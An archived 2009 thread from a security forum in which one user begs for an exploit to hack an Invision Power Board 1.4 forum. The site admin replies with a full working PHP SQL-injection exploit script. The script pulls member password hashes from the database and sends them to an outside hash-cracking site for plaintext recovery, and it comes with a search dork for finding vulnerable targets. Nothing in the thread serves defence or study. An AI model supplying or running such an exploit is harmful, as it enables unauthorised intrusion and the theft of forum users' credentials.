Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 66
Members: 0
Total: 66
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
Post new topicReply to topic View previous topic :: View next topic
I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
PostPosted: Thu Mar 19, 2009 11:17 am Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




I really need an Exploit for Invision Power Board 1.4, Please I really need it, very urgently.
Also, if you have any exploit that works on that system, please give it to me.

Thanks.
View user's profile Send private message
plzplzplz
PostPosted: Thu Mar 19, 2009 2:46 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




*up*
plz plz help!
i really need this!!!!
View user's profile Send private message
PostPosted: Thu Mar 19, 2009 3:16 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This is something I found for IPB 1.4, maybe works, maybe not ... just try it ...

Code:

<?php
//----------------------------------------------------------------------------------------------------//
// Invision Power Board Calendar SQL Injection Exploit
// Found by WaReZ
// Dork : "Powered by Invision Power Board (U) v1.4 Final 2005 IPS"
//----------------------------------------------------------------------------------------------------//
// Coded by Pr0T3cT10n < Pr0T3cT10n@Gmail.Com >
// KamikaZ-Team
// ISRAEL
//----------------------------------------------------------------------------------------------------//
set_time_limit(0);
ignore_user_abort(0);
function pull_out_md5($site, $path, $id)
{
echo('<div align="left" class="text">Exploiting..<br />');
$contents = file_get_contents('http://www.' .$site.$path. 'index.php?act=calendar&m=3&y=2008+AND+1=0+UNION+SELECT+1,id,2008,3,1,password,password,0x2A,password,password,password,password,password,password,password,password,password,password,password,password,password+FROM+ibf_members+where+id+=+' .$id. '+UNION+SELECT+*+FROM+ibf_calendar_events+WHERE+1=1');
if(preg_match("/eventid\=1\'\>([a-z0-9]+)\</", $contents, $matches))
{
echo('Found hash(' .$matches[1]. ')!<br />Try to crack it..<br />');
$md5_search = file_get_contents('http://gdataonline.com/qkhash.php?mode=txt&hash=' .$matches[1]);
if(preg_match("/<td width=\"35%\"><b>(.*)<\/b><\/td>/", $md5_search, $results))
echo('OK, <b>Cracked</b>(<b>' .$matches[1]. ' = ' .$results[1]. '</b>)<br />');
else
{
echo('Failed.<br />');
echo('Hash: ' .$matches[1]);
}
}
echo('</div>');
}
?>
<html dir="ltr">
<head>
<title>Invision Power Board Calendar SQL Injection Exploit</title>
<style>
* { background-color: #000000; font-family: Verdana; color: #999999; }
.text { font-size: 12px; }
a:link, a:visited, a:active { color: #e3e2e2; text-decoration: none; font-size: 11px;}
a:hover { color: #1774ba; font-size: 11px; }
input, textarea, select { background-color: black; color: #a6a6a6; border: solid 1px #363636; }
input:hover, textarea:hover { border-color: #D0D0D0; }
input:focus, textarea:focus { border-color: #F0E80A; color: #FFFFFF; }
</style>
</head>
<body>
<div align="left"><h2><u>Invision Power Board Calendar SQL Injection Exploit</u></h2></div>
<?php
if($_POST['site'] && $_POST['path'] && $_POST['id'] && $_POST['submit'])
pull_out_md5($_POST['site'], $_POST['path'], $_POST['id']);
else
echo('<div align="left"><form method="POST" action="?"><table class="text"><tr><td>Site:</td><td><input type="text" name="site"></td></tr><tr><td>Path:</td><td><input type="text" name="path"></td></tr><tr><td>User ID:</td><td><input type="text" name="id"></td></tr><tr><td><input type="submit" name="submit" value="Submit"></td></tr></table></form></div>');
?>
</body>
</html>
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Mar 19, 2009 6:13 pm Reply with quote
BenMix2
Advanced user
Advanced user
Joined: Jan 08, 2009
Posts: 65




thank you man!
View user's profile Send private message
I REALLY NEED HELP IN HACKING FORUM!!! ~*PLZ HELP*~
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.034 Seconds